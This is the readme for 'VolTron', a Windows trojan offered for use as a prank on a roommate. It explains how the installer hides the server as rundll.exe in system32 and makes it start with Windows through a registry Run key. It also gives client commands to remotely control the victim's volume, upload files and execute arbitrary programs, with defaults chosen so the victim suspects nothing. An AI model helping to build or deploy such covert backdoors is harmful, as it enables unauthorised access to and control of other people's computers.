VolTron - a volume control trojan http://telnet7.tripod.com Coded by nmr - nmr@phreaker.net Have you ever had one of those pesky roommate that kept blasting his music even though you said "please keep it down, I can't even hear myself". He kept bragging about his sound system even though it was nothing to brag about. Kept playing counterstrike where every pistol shot was like a grenade blasting. And you with your puny laptop speaker couldn't say a thing. Now you can do something about it. VolTron is a trojan that lets you take control of your victim's volume. So whenever you want peace and quite, you get it. If you wanna have fun, then turn up the volume all the way to max, and watch your victim freak out. [Features] - Controls the master volume control. - Sets the master volume control permanently so it can't be changed. - Sets the maximum limit for the master volume so it can't be exceeded but you can go below the limit set. - Sets the refresh rate, the time before the voltron server changes to a new setting or before it checks whether changes to the master volume has been made. If it has then restore it to the settings you have chosen. - Upload a file - Execute a file [Installation instructions] Once you unzip the voltron package you will have four files. For everything to install properly, all the files have to be in the same folder. install.bat -> installs the voltron server into the victims computer rundll.exe -> voltron server vtclient.exe -> voltron client, controls the server readme.txt -> this file you are reading install.bat copies rundll.exe to c:\windows\system32. Then it adds a line to the registry in 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run' to execute 'c:\windows\system32\rundll.exe' everytime windows starts up. If you need to modify install.bat, the info above should help you. And remember the rundll.exe file should be be in the same directory with install.bat for it to work. [Client commands] To connect to the server or your victim's computer. Go to the DOS command prompt and launch vtclient.exe using: vtclient victim_ip_or_computer_name Then if the client connects to the server it will show: Connected victim_ip_or_computer_name... > You can then type in some commands at the '>' prompt to change the server settings. You can change the volume, set a maximum volume limit, server refresh time, upload a file or execute a file or command. [Volume limit] vXXXXXS ets the maximum volume limit, XXXXX = 0 to 65535. This works only if blast value equals to 0. Default everytime the server starts is 65535, so everything looks normal and the victim doesn't suspect a thing. example: v10000 - sets maximum volume limit to 10000 [Blast] bXXXXX Sets the volume value permanently to the one you select, the victim can't change it even if he wants to, XXXXX = 0 to 65535 b10000 - sets volume permanently to 10000 [Sleep] sXXXXX Sets the server refresh rate. This determines how fast the master volume will go back to the setting you have set once the victim changes the master volume control on his or her PC. This also determines how fast the new setting will take effect once you change it using the client. XXXXX = (I'm not exactly sure but from what i've tried is 1 to 200000). 1000 = 1sec. Default everytime the server starts is 5000 = 5secs. s100 - refresh 100 [File upload] f Enter filename: foobar.exe Uploads foobar.exe to the same directory or path the server is in. So by default it goes to c:\windows\system32 as foobar.exe. Can be used to update the server. [Execute file] e Enter filename to execute: foobar.exe Execute foobar.exe on the victim's computer. Can execute almost any file on the victim but I haven't tried it yet.
